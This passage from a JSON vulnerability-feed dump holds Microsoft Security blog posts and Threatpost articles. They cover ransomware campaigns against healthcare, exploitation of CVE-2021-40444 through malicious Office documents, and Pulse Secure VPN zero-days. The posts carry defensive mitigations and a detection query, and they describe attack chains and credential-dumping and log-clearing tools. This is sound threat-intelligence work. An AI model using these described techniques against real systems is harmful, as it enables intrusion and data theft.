antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-30T18:56:37", "description": "In August, Microsoft Threat Intelligence Center (MSTIC) identified a small number of attacks (less than 10) that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders. These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\n\nThe observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document. Customers who enabled [attack surface reduction rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules?view=o365-worldwide>) to block Office from creating child processes are not impacted by the exploitation technique used in these attacks. While these attacks used a vulnerability to access entry point devices and run highly-privileged code, the secondary actions taken by the attackers still rely on stealing credentials and moving laterally to cause organization-wide impact. This illustrates the importance of investing in attack surface reduction, credential hygiene, and lateral movement mitigations. Customers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability.\n\nThis blog details our in-depth analysis of the attacks that used the CVE-2021-40444, provides detection details and investigation guidance for [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) customers, and lists mitigation steps for hardening networks against this and similar attacks. Our colleagues at [RiskIQ conducted their own analysis](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) and coordinated with Microsoft in publishing this research.\n\n## Exploit delivery mechanism\n\nThe initial campaigns in August 2021 likely originated from emails impersonating contracts and legal agreements, where the documents themselves were hosted on file-sharing sites. The exploit document used an external oleObject relationship to embed exploitative JavaScript within MIME HTML remotely hosted content that results in (1) the download of a CAB file containing a DLL bearing an INF file extension, (2) decompression of that CAB file, and (3) execution of a function within that DLL. The DLL retrieves remotely hosted shellcode (in this instance, a custom Cobalt Strike Beacon loader) and loads it into _wabmig.exe_ (Microsoft address import tool.)\n\n\n\n_Figure 1. The original exploit vector: an externally targeted oleObject relationship definition bearing an MHTML handler prefix pointed at an HTML file hosted on infrastructure that has similar qualities to the Cobalt Strike Beacon infrastructure that the loader\u2019s payload communicates with._\n\nContent that is downloaded from an external source is tagged by the Windows operating system with a mark of the web, indicating it was downloaded from a potentially untrusted source. This invokes Protected Mode in Microsoft Office, requiring user interaction to disable it to run content such as macros. However, in this instance, when opened without a mark of the web present, the document\u2019s payload executed immediately without user interaction \u2013 indicating the abuse of a vulnerability.\n\n\n\n_Figure 2. Attack chain of DEV-0413 campaign that used CVE-2021-40444_\n\n## DEV-0413 observed exploiting CVE-2021-40444\n\nAs part of Microsoft\u2019s ongoing commitment to tracking both nation state and cybercriminal threat actors, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d and utilize a threat actor naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during the tracking and investigation phases before MSTIC reaches high confidence about the origin or identity of the actor behind an operation. MSTIC tracks a large cluster of cybercriminal activity involving Cobalt Strike infrastructure under the name DEV-0365.\n\nThe infrastructure we associate with DEV-0365 has several overlaps in behavior and unique identifying characteristics of Cobalt Strike infrastructure that suggest it was created or managed by a distinct set of operators. However, the follow-on activity from this infrastructure indicates multiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware). One explanation is that DEV-0365 is involved in a form of command- and-control infrastructure as a service for cybercriminals.\n\nAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads -- activity that overlaps with a group Microsoft tracks as DEV-0193. DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878.\n\nDue to the uncertainty surrounding the nature of the shared qualities of DEV-0365 infrastructure and the significant variation in malicious activity, MSTIC clustered the initial email campaign exploitation identified as CVE-2021-40444 activity separately, under DEV-0413.\n\nThe DEV-0413 campaign that used CVE-2021-40444 has been smaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure. We observed the earliest exploitation attempt of this campaign on August 18. The social engineering lure used in the campaign, initially highlighted by Mandiant, aligned with the business operations of targeted organizations, suggesting a degree of purposeful targeting. The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted. In most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\n\nIt is worth highlighting that while monitoring the DEV-0413 campaign, Microsoft identified active DEV-0413 infrastructure hosting CVE-2021-40444 content wherein basic security principles had not been applied. DEV-0413 did not limit the browser agents able to access the server to their malware implant or known targets, thereby permitting directory listing for their web server. In doing so, the attackers exposed their exploit to anyone who might have gained interest based on public social media discussion.\n\n\n\n_Figure 3. Content of the original DEV-0413 email lure seeking application developers_\n\nAt least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack. It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\n\nIn a later wave of DEV-0413 activity on September 1, Microsoft identified a lure change from targeting application developers to a \u201csmall claims court\u201d legal threat.\n\n\n\n_Figure 4. Example of the \u201cSmall claims court\u201d lure utilized by DEV-0413__ _\n\n## Vulnerability usage timeline\n\nOn August 21, 2021, MSTIC observed a social media post by a Mandiant employee with experience tracking Cobalt Strike Beacon infrastructure. This post highlighted a Microsoft Word document (SHA-256: [3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf](<https://www.virustotal.com/gui/file/3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf>)) that had been uploaded to VirusTotal on August 19, 2021. The post\u2019s focus on this document was highlighting the custom Cobalt Strike Beacon loader and did not focus on the delivery mechanism.\n\nMSTIC analyzed the sample and determined that an anomalous oleObject relationship in the document was targeted at an external malicious HTML resource with an MHTML handler and likely leading to abuse of an undisclosed vulnerability. MSTIC immediately engaged the Microsoft Security Response Center and work began on a mitigation and patch. During this process, MSTIC collaborated with the original finder at Mandiant to reduce the discussion of the issue publicly and avoid drawing threat actor attention to the issues until a patch was available. Mandiant partnered with MSTIC and did their own reverse engineering assessment and submitted their findings to MSRC.\n\nOn September 7, 2021, Microsoft released a security advisory for CVE-2021-40444 containing a partial workaround. As a routine in these instances, Microsoft was working to ensure that the detections described in the advisory would be in place and a patch would be available before public disclosure. During the same time, a third-party researcher reported a sample to Microsoft from the same campaign originally shared by Mandiant. This sample was publicly disclosed on September 8. We observed a rise in exploitation attempts within 24 hours.\n\n\n\n_Figure 5. Graphic showing original exploitation on August 18 and attempted exploitation increasing after public disclosure _\n\nMicrosoft continues to monitor the situation and work to deconflict testing from actual exploitation. Since the public disclosure, Microsoft has observed multiple threat actors, including ransomware-as-a-service affiliates, adopting publicly disclosed proof-of-concept code into their toolkits. We will continue to provide updates as we learn more.\n\n## Mitigating the attacks\n\nMicrosoft has confirmed that the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) blocks activity associated with exploitation of CVE-2021-40444 at the time of publishing:\n\n * \u200bBlock all Office applications from creating child processes\n\nApply the following mitigations to reduce the impact of this threat and follow-on actions taken by attackers.\n\n * Apply the security updates for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). Comprehensive updates addressing the vulnerabilities used in this campaign are available through the [September 2021 security updates](<https://msrc.microsoft.com/update-guide/>).\n * Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.\n * Use a supported platform, such as Windows 10, to take advantage of regular security updates.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>)in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>)in Microsoft Defender for Endpoint, to prevent malicious changes to security settings.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>)so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>)in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>)to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Microsoft 365 Defender detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [TrojanDownloader:O97M/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA&threatId=-2147225317>) \u2013 Detects the Word Doc files in the observed attacks\n * [TrojanDownloader:HTML/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:HTML/Donoff.SA&threatId=-2147174205>) \u2013 Detects the remotely-loaded HTML\n * [Trojan:Win32/Agent.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Agent.SA&threatId=-2147178093>) -- Detects the .inf(Dll)/CAB components in the observed attacks\n * [Trojan:Win32/CplLoader.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/CplLoader.A&threatId=-2147178092>) \u2013 Blocks Rundll32/Control abuse used in this CVE exploitation\n * [Behavior:Win32/OfficeMhtInj.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/OfficeMhtInj.A&threatId=-2147178094>) \u2013 Detects the injection into wabmig.exe\n * [TrojanDownloader:O97M/Donoff.SA!CAB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!CAB&threatId=-2147173661>) \u2013 Detects CAB files in observed attacks\n * [TrojanDownloader:O97M/Donoff.SA!Gen](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!Gen&threatId=-2147173660>) \u2013 Detects Office documents in observed attacks\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Possible exploitation of CVE-2021-40444 (requires Defender Antivirus as the Active AV)\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious Behavior By Office Application (detects the anomalous process launches that happen in exploitation of this CVE, and other malicious behavior)\n * Suspicious use of Control Panel item\n\n**Microsoft Defender for Office365**\n\nMicrosoft Defender for Office 365 detects exploit documents delivered via email when detonation is enabled using the following detection names:\n\n * Trojan_DOCX_OLEAnomaly_A \n * Description = "The sample is an Office document which contains a suspicious oleobject definition."\n * Trojan_DOCX_OLEAnomaly_AB \n * Description = "The sample is an Office document which exhibits malicious template injection qualities."\n * Exploit_Office_OleObject_A \n * Description = "This sample is an Office document which exhibits malicious qualities."\n * Exploit_Office_OleObject_B \n * Description = "This sample is an Office document which exhibits malicious qualities."\n\nThe following alerts in your portal indicate that a malicious attachment has been blocked, although these alerts are also used for many different threats:\n\n * Malware campaign detected and blocked\n * Malware campaign detected after delivery\n * Email messages containing malicious file removed after delivery\n\n## Advanced hunting\n\nTo locate possible exploitation activity, run the following queries.\n\n**Relative path traversal (requires Microsoft 365 Defender)**\n\nUse the following query to surface abuse of Control Panel objects (.cpl) via URL protocol handler path traversal as used in the original attack and public proof of concepts at time of publishing:\n\n`DeviceProcessEvents \n| where (FileName in~('control.exe','rundll32.exe') and ProcessCommandLine has '.cpl:') \nor ProcessCommandLine matches regex @'\\\"\\.[a-zA-Z]{2,4}:\\.\\.\\/\\.\\.'`\n\n**Azure Sentinel **\n\nTo locate possible attacks that exploit the CVE-2021-40444 , Azure Sentinel customers can leverage the following detection query: [Azure Sentinel MSHTML exploit detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/MSHTMLVuln.yaml>).\n\n \n\nThe post [Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-09-15T23:40:56", "type": "mssecure", "title": "Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-15T23:40:56", "id": "MSSECURE:795E0A765679492C51FEFA2B19EAD597", "href": "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-05-04T17:56:13", "description": "Pulse Secure has [rushed a fix](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) for a critical zero-day security vulnerability in its Connect Secure VPN devices, which has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe.\n\nPulse Secure also patched three other security bugs, two of them also critical RCE vulnerabilities.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe zero-day flaw, tracked as CVE-2021-22893, was first disclosed on April 20 and carries the highest possible CVSS severity score, 10 out of 10. An exploit allows remote code-execution (RCE) and two-factor authentication bypass. The bug [is being used in the wild](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) to gain administrator-level access to the appliances, according to research from Pulse Secure\u2019s parent company, Ivanti.\n\nIt\u2019s related to multiple use-after-free problems in Pulse Connect Secure before version 9.1R11.4, according to the advisory issued Tuesday, and \u201callows a remote unauthenticated attacker to execute arbitrary code via license server web services.\u201d It can be exploited without any user interaction.\n\nThe activity level has been such that the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://cyber.dhs.gov/ed/21-03/>) warning businesses of the ongoing campaigns. These are [being tracked by FireEye Mandiant](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) as being carried out by two main advanced persistent threat (APT) clusters with links to China: UNC2630 and UNC2717.\n\nIn addition to the exploit for CVE-2021-22893, the campaigns involve 12 different malware families overall, Mandiant said. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement.\n\n\u201cNation-state hackers will forever pose a threat to businesses around the world,\u201d Andrey Yesyev, director of cybersecurity at Accedian, said via email. \u201cThese types of attacks are almost impossible to detect and are increasingly dangerous for any organization\u2019s sensitive data. Once hackers gain initial access to a victim\u2019s network, they\u2019ll move laterally in order to find valuable data. Furthermore, if they\u2019re able to infiltrate an organization\u2019s perimeter, bad actors could establish a connection to a command-and-control server (C2) \u2013 allowing them to control compromised systems and steal data from target networks.\u201d\n\n## **Additional Critical Pulse Connect VPN RCE Bugs**\n\nPulse Secure also rolled out fixes for three other concerning issues. Threatpost has reached out to Pulse Secure to find out whether these bugs are also being actively exploited in the wild.\n\nThe other patches are:\n\n * **CVE-2021-22894 (CVSS rating of 9.9)**: A buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows remote authenticated users to execute arbitrary code as the root user via maliciously crafted meeting room.\n * **CVE-2021-22899 (CVSS rating of 9.9):** A command-injection bug in Pulse Connect Secure before 9.1R11.4 allows remote authenticated users to perform RCE via Windows File Resource Profiles.\n * **CVE-2021-22900 (CVSS rating of 7.2):** Multiple unrestricted uploads in Pulse Connect Secure before 9.1R11.4 allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.\n\n## **Pulse Secure: A Cyberattacker\u2019s Favorite**\n\nPulse Secure appliances have been in the sights of APTs for months, with ongoing nation-state attacks using the bug tracked as CVE-2019-11510. It allows unauthenticated remote attackers to send a specially crafted URI to carry out arbitrary file-reading \u2013 perfect for espionage efforts.\n\nHere\u2019s a rundown of recent activity:\n\n * **April:** [The FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n * **April**: The Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n * **October**: CISA said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\nTo stay safe, Accedian\u2019s Yesyev suggested monitoring east-west traffic to detect these types of intrusions.\n\n\u201cAnd in order to detect C2 communications, it\u2019s important to have visibility into network communication patterns,\u201d he added. \u201cThis is yet another instance that proves the benefits of a layered security model. In addition to adopting network-based threat detection and user/endpoint behavior analytics solutions, security must be designed into the DevOps cycle. These technologies and processes help organizations understand communication patterns and destinations to help identify C2 tunnels\u2026allowing teams to identify stealthy lateral movements and ultimately protect data from being stolen.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-04T17:42:30", "type": "threatpost", "title": "Pulse Secure VPNs Get a Fix for Critical Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900"], "modified": "2021-05-04T17:42:30", "id": "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "href": "https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-21T15:44:32", "description": "A critical zero-day security vulnerability in Pulse Secure VPN devices has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe, researchers said.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nThe flaw, tracked as CVE-2021-22893, allows remote code-execution (RCE) and is being used in the wild to gain administrator-level access to the appliances, according to Ivanti research. Pulse Secure said that the zero-day will be patched in early May; but in the meantime, the company worked with Ivanti (its parent company) to release both mitigations and the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/KB44755/s>), to help determine if systems have been impacted.\n\n\u201cThe investigation shows ongoing attempts to exploit four issues: The substantial bulk of these issues involve three vulnerabilities that were patched in 2019 and 2020: [Security Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) (CVE-2019-11510), [Security Advisory SA44588](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588>) (CVE-2020-8243) and [Security Advisory SA44601](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601>) (CVE-2020-8260),\u201d according to a Pulse Secure statement provided to Threatpost. \u201cThe new issue, discovered this month, impacted a very limited number of customers.\u201d\n\n## **CVE-2021-22893: A Zero-Day in Pulse Connect Secure VPNs**\n\nThe newly discovered critical security hole is rated 10 out of 10 on the CVSS vulnerability-rating scale. It\u2019s an authentication bypass vulnerability that can allow an unauthenticated user to perform RCE on the Pulse Connect Secure gateway. It \u201cposes a significant risk to your deployment,\u201d according to the advisory, [issued Tuesday](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>).\n\n\u201cThe ongoing COVID-19 crisis resulted in an overnight shift to remote work culture, and VPNs played a critical role to make this possible,\u201d Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said via email. \u201cVPNs have become a prime target for cybercriminals and over the past few months.\u201d\n\n\u201cThe Pulse Connect Secure vulnerability with CVE-2021-22893\u2026can be exploited without any user interaction,\u201d he added.\n\nThe mitigations involve importing a file called \u201cWorkaround-2104.xml,\u201d available on the advisory page. It disables the Windows File Share Browser and Pulse 